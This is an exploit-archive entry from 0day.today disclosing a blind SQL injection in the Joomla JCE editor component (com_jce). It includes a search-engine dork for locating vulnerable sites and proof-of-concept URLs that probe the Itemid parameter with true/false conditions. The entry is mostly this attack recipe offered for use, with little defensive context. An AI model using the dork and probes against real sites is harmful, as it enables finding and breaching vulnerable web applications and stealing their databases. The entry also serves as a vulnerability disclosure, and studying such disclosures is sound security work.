Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability

2011-04-10T00:00:00
ID 1337DAY-ID-15819
Type zdt
Reporter eidelweiss
Modified 2011-04-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  BLind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"
   
   
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
   
   
===================================================================
 
Description:
 
JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
 
===================================================================
 
    exploit & p0c
   
[!] index.php?option=com_jce&Itemid=[valid Itemid]
   
    Example p0c
   
[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False
   
   
====================================================================



#  0day.today [2018-04-13]  #